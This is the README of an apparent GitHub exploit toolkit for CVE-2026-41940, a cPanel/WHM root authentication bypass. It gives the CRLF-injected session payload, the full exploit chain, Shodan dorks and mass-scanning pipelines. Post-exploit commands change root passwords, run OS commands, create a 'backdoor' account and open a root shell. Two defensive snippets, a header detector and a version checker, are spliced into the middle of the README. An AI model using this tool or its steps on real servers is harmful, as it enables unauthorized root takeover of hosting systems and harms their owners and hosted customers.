sardine-web/Automated-scanner-CVE-2026-41940

GitHub: sardine-web/Automated-scanner-CVE-2026-41940

Stars: 1 | Forks: 0

# CPANEL CVE EXPLOIT

**English** | **[فارسی (Persian)](README.fa.md)**

[![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://www.python.org/)
[![CVE](https://img.shields.io/badge/CVE-2026--41940-critical?style=for-the-badge&logo=dependabot&logoColor=white)](https://nvd.nist.gov/)
[![CVSS](https://img.shields.io/badge/CVSS-10.0-red?style=for-the-badge)](https://www.first.org/cvss/)
[![License](https://img.shields.io/badge/License-MIT-green?style=for-the-badge)](LICENSE)
[![Stdlib](https://img.shields.io/badge/Dependencies-stdlib%20only-orange?style=for-the-badge)](requirements.txt)

**Automated scanner & post-exploitation toolkit for CVE-2026-41940 — cPanel & WHM root authentication bypass via session-file CRLF injection.**

## Table of Contents

- [Overview](#overview)
- [CVE Details](#cve-details)
- [How It Works](#how-it-works)
- [Features](#features)
- [Affected Versions](#affected-versions)
- [Requirements](#requirements)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
- [Post-Exploit Actions](#post-exploit-actions)
- [Interactive WHM Shell](#interactive-whm-shell)
- [Mass Scanning & Pipeline Integration](#mass-scanning--pipeline-integration)
- [Shodan Dorks](#shodan-dorks)
- [Output Format](#output-format)
- [Example Session](#example-session)
- [Legal Disclaimer](#legal-disclaimer)

## Overview

**CPANEL CVE EXPLOIT** is a single-file Python tool designed for **authorized security assessments** of cPanel & WHM servers vulnerable to **CVE-2026-41940**. The vulnerability allows an unauthenticated remote attacker to poison WHM session files through CRLF injection in the `Authorization: Basic` header, bypassing authentication and gaining **root-level WHM access** without valid credentials.

| Property | Value |
|----------|-------|
| **CVE** | CVE-2026-41940 |
| **Severity** | Critical |
| **CVSS** | 10.0 |
| **Attack Vector** | Network / Unauthenticated |
| **Impact** | Full WHM root access |
| **Default Port** | `2087` (WHM) |
| **Status** | In-the-wild exploitation confirmed (Apr 2026) |

## CVE Details

### Root Cause

In vulnerable versions of cPanel & WHM, `saveSession()` in `Session.pm` calls `filter_sessiondata()` **after** writing the session file to disk. An attacker can inject CRLF (`\r\n`) characters through the HTTP `Authorization: Basic` header, which gets written directly into the on-disk session file — bypassing sanitization.

### Injected Session Fields

The tool uses a Base64-encoded payload that decodes to:

```
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
```

These fields simulate a fully authenticated root WHM session, including 2FA bypass (`tfa_verified=1`) and root privilege flag (`hasroot=1`).
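The decoded credential above is also what a defender can key on at the edge or in request logs: a legitimate `Authorization: Basic` value decodes to a single `user:password` string with no control characters, while a poisoned one decodes to several lines of session fields. The following is an added example written for this page, not code from the tool or from cPanel; it decodes Basic credentials found in raw HTTP request headers and flags CR/LF bytes or any of the session-field names listed above. Both sample requests are constructed, and `whm.example.test` is a placeholder host.

```python
import base64
import binascii

# Session-file field names the README lists as the injected payload.
# Their presence inside a Basic credential is a strong indicator on its own.
INJECTED_MARKERS = (
    "successful_internal_auth_with_timestamp=",
    "user=root",
    "tfa_verified=",
    "hasroot=",
)


def decode_basic_auth(header_value):
    """Return the decoded bytes of a 'Basic <base64>' value, or None if the value
    is not a Basic credential or is not valid base64 (strict decoding)."""
    parts = header_value.strip().split(None, 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return None
    try:
        return base64.b64decode(parts[1], validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_authorization(header_value):
    """Classify one Authorization header value.

    Returns {"suspicious": bool, "reasons": [...]}. A credential is flagged when
    it carries CR/LF bytes (the injection primitive described above) or contains
    one of the known session-field markers."""
    raw = decode_basic_auth(header_value)
    if raw is None:
        return {"suspicious": False, "reasons": ["not a decodable Basic credential"]}
    reasons = []
    if b"\r" in raw or b"\n" in raw:
        reasons.append("CR/LF bytes inside Basic credential")
    text = raw.decode("latin-1")  # byte-preserving decode; we only search for ASCII markers
    for marker in INJECTED_MARKERS:
        if marker in text:
            reasons.append(f"session field marker {marker!r} in credential")
    return {"suspicious": bool(reasons), "reasons": reasons}


def scan_request_headers(raw_request):
    """Scan the header block of a raw HTTP request and return the findings for
    every Authorization header that looks poisoned (an empty list if none)."""
    findings = []
    for line in raw_request.split("\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "authorization":
            result = inspect_authorization(value)
            if result["suspicious"]:
                findings.append(result)
    return findings


# Constructed sample requests (not captured traffic). The poisoned credential
# reuses the field names from the README so the detector has something to find.
_BENIGN_CRED = base64.b64encode(b"root:x").decode()
_POISONED_CRED = base64.b64encode(b"root:x\r\nuser=root\r\ntfa_verified=1\r\nhasroot=1").decode()

BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: whm.example.test:2087\r\n"
    f"Authorization: Basic {_BENIGN_CRED}\r\n"
    "\r\n"
)
POISONED_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: whm.example.test:2087\r\n"
    f"Authorization: Basic {_POISONED_CRED}\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("poisoned", POISONED_REQUEST)):
        print(label, scan_request_headers(req))
```

The strict `validate=True` decode matters: a value that is not valid base64 cannot be the payload described here, so it is left to the normal authentication path rather than being flagged. CR/LF detection is the durable signal; the marker list only names the fields this README documents and should be extended if an advisory lists others.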
### Fix

cPanel moved `filter_sessiondata()` to execute **before** the session write operation in `Session.pm`.

## How It Works

The exploit chain consists of **5 stages** (Stage 0–4):

```mermaid
flowchart TD
    A[Stage 0: Canonical Host Discovery] --> B[Stage 1: Mint Preauth Session]
    B --> C[Stage 2: CRLF Injection via Authorization Header]
    C --> D[Stage 3: Session Propagation via do_token_denied]
    D --> E[Stage 4: Verify Root Access via json-api/version]
    E --> F{Vulnerable?}
    F -->|Yes| G[Post-Exploit Actions / Interactive Shell]
    F -->|No| H[Skip Target]
    A -.- A1["GET /openid_connect/cpanelid → 307 redirect reveals real hostname"]
    B -.- B1["POST /login/?login_only=1 → whostmgrsession cookie"]
    C -.- C1["GET / + poisoned Basic auth → /cpsessXXXXXXXXXX token"]
    D -.- D1["GET /scripts2/listaccts → flush raw session to cache"]
    E -.- E1["GET /cpsessXXX/json-api/version → HTTP 200 + version JSON"]
```

| Stage | Endpoint | Purpose |
|-------|----------|---------|
| **0** | `/openid_connect/cpanelid` | Auto-discover canonical hostname via 307 redirect |
| **1** | `/login/?login_only=1` | Obtain preauth `whostmgrsession` cookie with wrong credentials |
| **2** | `/` | Inject CRLF-poisoned `Authorization: Basic` header into session file |
| **3** | `/scripts2/listaccts` | Trigger `do_token_denied` gadget to flush session to cache |
| **4** | `/{token}/json-api/version` | Confirm root access — HTTP 200 with version JSON |

## Features

| Feature | Description |
|---------|-------------|
| **Single-target scan** | Full exploit chain against one WHM URL |
| **Mass scanning** | Multi-threaded scanning from file or stdin |
| **Version detection** | Automatic patched/vulnerable version comparison |
| **Post-exploit API** | Password change, command exec, account listing, user creation |
| **Interactive shell** | Built-in WHM root shell with file read & API commands |
| **Selenium login** | Auto-inject session cookie into Chrome/Firefox |
| **Manual browser fallback** | Console JavaScript snippets for manual WHM login |
| **RCE check** | Quick `id` / `uname -a` verification after bypass |
| **JSON export** | Save all findings to structured JSON report |
| **Pipeline-ready** | Works with `httpx`, `subfinder`, `shodan`, and `awk` pipelines |
| **Stdlib only** | No pip dependencies required for core functionality |
| **Colorized output** | Real-time stage logging with severity indicators |

## Affected Versions

| Branch | Patched At | Status |
|--------|-----------|--------|
| 11.110.x | `11.110.0.97` | Vulnerable below patch |
| 11.118.x | `11.118.0.63` | Vulnerable below patch |
| 11.126.x | `11.126.0.54` | Vulnerable below patch |
| 11.132.x | `11.132.0.29` | Vulnerable below patch |
| 11.134.x | `11.134.0.20` | Vulnerable below patch |
| 11.136.x | `11.136.0.5` | Vulnerable below patch |

## Requirements

### Core (required)

- **Python 3.8+**
- No external packages — uses Python standard library only

### Optional

| Package | Purpose |
|---------|---------|
| `selenium` | Browser auto-login (`--selenium`) |
| Chrome / Firefox | Browser engine for Selenium |

```bash
pip install -r requirements.txt   # optional — selenium only
```

## Installation

```bash
git clone https://github.com/YOUR_USERNAME/cpanel-cve-exploit.git
cd cpanel-cve-exploit
```

No build step required.
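The Affected Versions table above gives exactly one patched build per branch, so deciding whether a given server is exposed is a branch lookup followed by a numeric comparison of the four version components. The following added example, written for this page and not taken from the project, implements that check for an administrator or patch-management job: it accepts bare version strings as well as the `{"version": ...}` body that `json-api/version` returns, and reports unlisted branches as `unknown` (needing manual review) rather than guessing. The sample inputs are constructed.

```python
import json
import re

# Patched build per branch, copied from the Affected Versions table in this README.
# Anything below the listed build on the same branch is vulnerable.
PATCHED_BY_BRANCH = {
    (11, 110): (11, 110, 0, 97),
    (11, 118): (11, 118, 0, 63),
    (11, 126): (11, 126, 0, 54),
    (11, 132): (11, 132, 0, 29),
    (11, 134): (11, 134, 0, 20),
    (11, 136): (11, 136, 0, 5),
}

_VERSION_RE = re.compile(r"\s*(\d+)\.(\d+)\.(\d+)\.(\d+)\s*")


def parse_version(text):
    """Parse a cPanel/WHM version such as '11.126.0.50' into a 4-tuple of ints.
    Returns None for anything that is not exactly four dotted integers."""
    if not isinstance(text, str):
        return None
    m = _VERSION_RE.fullmatch(text)
    if not m:
        return None
    return tuple(int(g) for g in m.groups())


def assess_version(text):
    """Return 'vulnerable', 'patched' or 'unknown' for a version string.

    'unknown' covers unparsable input and branches the table does not list;
    a defender should treat both as needing manual confirmation, not as safe."""
    version = parse_version(text)
    if version is None:
        return "unknown"
    patched = PATCHED_BY_BRANCH.get(version[:2])
    if patched is None:
        return "unknown"
    # Tuple comparison is lexicographic, which is the right order for dotted versions.
    return "vulnerable" if version < patched else "patched"


def assess_api_response(body_text):
    """Assess the JSON body of a json-api/version reply, e.g. '{"version":"11.126.0.50"}'."""
    try:
        body = json.loads(body_text)
    except ValueError:
        return "unknown"
    if not isinstance(body, dict):
        return "unknown"
    return assess_version(body.get("version"))


def summarize(versions):
    """Count how many of the given version strings fall into each status."""
    counts = {"vulnerable": 0, "patched": 0, "unknown": 0}
    for v in versions:
        counts[assess_version(v)] += 1
    return counts


if __name__ == "__main__":
    # Constructed inventory of builds, one per outcome.
    sample = ["11.126.0.50", "11.136.0.5", "11.140.0.1", "not-a-version"]
    for v in sample:
        print(f"{v:>15}: {assess_version(v)}")
    print(summarize(sample))
```

Because the comparison is per branch, `11.126.0.54` is patched while `11.132.0.28` is still vulnerable even though it is numerically "higher"; do not collapse the table into a single minimum version.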
Run directly:

```bash
python3 test-cve.py --help
```

## Quick Start

```bash
# Scan a single WHM target
python3 test-cve.py -u https://target.com:2087

# Scan with post-exploit: list all cPanel accounts
python3 test-cve.py -u https://target.com:2087 --action list

# Mass scan from file, 20 threads, save JSON report
python3 test-cve.py -l targets.txt -t 20 -o results.json
```

## Usage

```
usage: test-cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME] [-t THREADS]
                   [--timeout TIMEOUT] [--rate-limit RATE_LIMIT]
                   [--action {list,passwd,cmd,exec,info,version,shell,adduser}]
                   [--passwd PASSWD] [--cmd CMD] [--new-user NEW_USER]
                   [--new-domain NEW_DOMAIN] [--read-file READ_FILE] [--selenium]
                   [--engine {chrome,firefox}] [--browser] [--check-rce]
                   [-o OUTPUT] [--no-color]
```

### Target Options

| Flag | Description |
|------|-------------|
| `-u`, `--url` | Single target URL (e.g. `https://host:2087`) |
| `-l`, `--list` | File containing URLs, one per line |
| `--hostname` | Override canonical Host header (auto-discovered by default) |

### Scan Options

| Flag | Default | Description |
|------|---------|-------------|
| `-t`, `--threads` | `10` | Number of concurrent scan threads |
| `--timeout` | `15` | HTTP timeout in seconds |
| `--rate-limit` | `0` | Delay (seconds) between target submissions |

### Output Options

| Flag | Description |
|------|-------------|
| `-o`, `--output` | Save findings to JSON file |
| `--no-color` | Disable ANSI color output |

## Post-Exploit Actions

| Action | Flag | Description |
|--------|------|-------------|
| **Scan only** | *(default)* | Run exploit chain and report vulnerability |
| **List accounts** | `--action list` | List all cPanel accounts via WHM API |
| **Change password** | `--action passwd --passwd ` | Change root WHM password |
| **Execute command** | `--action cmd --cmd "id;whoami"` | Run OS command via WHM exec API |
| **Server info** | `--action info` | Gather hostname, load, disk, version |
| **Get version** | `--action version` | Fetch cPanel/WHM version via API |
| **Create account** | `--action adduser --new-user u --new-domain d.com --passwd p` | Create new cPanel account |
| **Interactive shell** | `--action shell` | Launch interactive WHM root shell |
| **RCE check** | `--check-rce` | Run `id;uname -a` after successful bypass |
| **Selenium login** | `--selenium [--engine chrome\|firefox]` | Auto-login to WHM dashboard in browser |
| **Manual browser** | `--browser` | Print JavaScript console commands for manual login |

### Examples

```bash
# Change root password after bypass
python3 test-cve.py -u https://target.com:2087 --action passwd --passwd 'P@ss2026!'

# Execute remote command
python3 test-cve.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"

# Create backdoor cPanel account
python3 test-cve.py -u https://target.com:2087 \
  --action adduser --new-user backdoor --new-domain evil.com --passwd 'TempPass2026!'

# Open interactive WHM shell
python3 test-cve.py -u https://target.com:2087 --action shell

# Auto-login via Chrome
python3 test-cve.py -u https://target.com:2087 --selenium --engine chrome

# Manual browser login (prints JS for DevTools console)
python3 test-cve.py -u https://target.com:2087 --browser
```

## Interactive WHM Shell

Launch with `--action shell` for a full interactive session:

```
root@target.com ▶ help
  id / whoami / hostname / version  → server info
  ls [path]                         → file listing
  cat [path]                        → read file contents
  accounts                          → list cPanel accounts
  addadmin                          → create WHM admin/reseller
  passwd                            → change root password
  exec                              → run OS command
  exit / quit                       → exit shell
```

**Example:**

```
root@192.168.1.100 ▶ id
uid=0(root) gid=0(root) groups=0(root)
root@192.168.1.100 ▶ accounts
user=webuser1 domain=example.com email=admin@example.com
user=webuser2 domain=test.com email=info@test.com
root@192.168.1.100 ▶ cat /etc/passwd
root@192.168.1.100 ▶ exit
```

## Mass Scanning & Pipeline Integration

### From file

```bash
python3 test-cve.py -l targets.txt -t 20 -o results.json
```

### From stdin (pipe)

```bash
cat urls.txt | python3 test-cve.py

# subfinder + httpx pipeline
subfinder -d example.com -silent | httpx -p 2087 -silent | python3 test-cve.py -t 30

# Shodan pipeline
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | python3 test-cve.py -t 30 -o shodan_results.json
```

### Supported input formats

| Format | Example |
|--------|---------|
| Full URL | `https://192.168.1.1:2087` |
| IP + port | `192.168.1.1 2087` |
| Shodan output | Parsed automatically via regex |
| ANSI-colored output | Stripped automatically |

## Shodan Dorks

```
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"WHM" ssl:"cpanel" port:2087
```

## Output Format

Findings are saved as JSON when using `-o results.json`:

```json
{
  "scanner": "cPanelSniper v2.0",
  "cve": "CVE-2026-41940",
  "timestamp": "2026-05-23T12:00:00.000000",
  "findings": [
    {
      "severity": "CRIT",
      "title": "CVE-2026-41940 — cPanel & WHM Authentication Bypass",
      "target": "https://target.com:2087",
      "canonical": "server.target.com",
      "session": "root:SessionName",
      "token": "/cpsess1234567890",
      "version": "11.126.0.50",
      "api_url": "https://target.com:2087/cpsess1234567890/json-api/version",
      "evidence": "{\"version\":\"11.126.0.50\"...}",
      "cve": "CVE-2026-41940",
      "cvss": "10.0",
      "timestamp": "2026-05-23T12:00:05.000000"
    }
  ]
}
```

### Console summary

```
══════════════════════════════════════════════════════════════════════
  cPanelSniper — CVE-2026-41940 Scan Complete
  Time: 12.4s · Targets: 50
──────────────────────────────────────────────────────────────────────
  ⚡ 2 VULNERABLE TARGET(S)

  Target   : https://victim1.com:2087
  Version  : 11.126.0.50
  Token    : /cpsess1234567890
  API URL  : https://victim1.com:2087/cpsess1234567890/json-api/version
  Evidence : {"version":"11.126.0.50"...}
══════════════════════════════════════════════════════════════════════
```

## Example Session

```
$ python3 test-cve.py -u https://target.com:2087

Configuration:
  Targets : 1
  Threads : 10
  Timeout : 15s
  Action  : scan only

12:00:01 [INFO] Canonical hostname discovered: server.target.com
12:00:02 [ OK] Stage1: preauth session = root:abc123...
12:00:03 [ OK] Stage2: HTTP 307 → token=/cpsess1234567890
12:00:04 [ OK] Stage3: HTTP 401 — do_token_denied gadget fired
12:00:05 [INFO] Stage4: HTTP 200 {"version":"11.126.0.50"...}
12:00:05 [PWND] CVE-2026-41940 CONFIRMED — WHM root access! (v11.126.0.50 — CONFIRMED vulnerable)
12:00:05 [PWND] Token   : /cpsess1234567890
12:00:05 [PWND] Session : root:abc123...
12:00:05 [PWND] Version : 11.126.0.50
12:00:05 [PWND] API URL : https://target.com:2087/cpsess1234567890/json-api/version
```

## Project Structure

```
cpanel-cve-exploit/
├── test-cve.py        # Main scanner & exploit tool (single file)
├── requirements.txt   # Optional: selenium
├── README.md          # English documentation
└── README.fa.md       # Persian documentation (فارسی)
```

## Legal Disclaimer

This tool is provided for **educational and authorized penetration testing purposes only**.

- Only use against systems you **own** or have **explicit written permission** to test.
- Unauthorized access to computer systems is **illegal** under laws including the CFAA (US), Computer Misuse Act (UK), and equivalent legislation worldwide.
- In-the-wild exploitation of CVE-2026-41940 has been confirmed — patch affected systems immediately.
- The authors and contributors **accept no liability** for misuse of this software.

By using this tool, you agree to use it responsibly and in compliance with all applicable laws.

## References

- [CVE-2026-41940](https://nvd.nist.gov/) — NVD Entry
- cPanel Security Advisory — Session.pm CRLF injection patch
- WHM default port: `2087` (HTTPS)

Built for security researchers · Use responsibly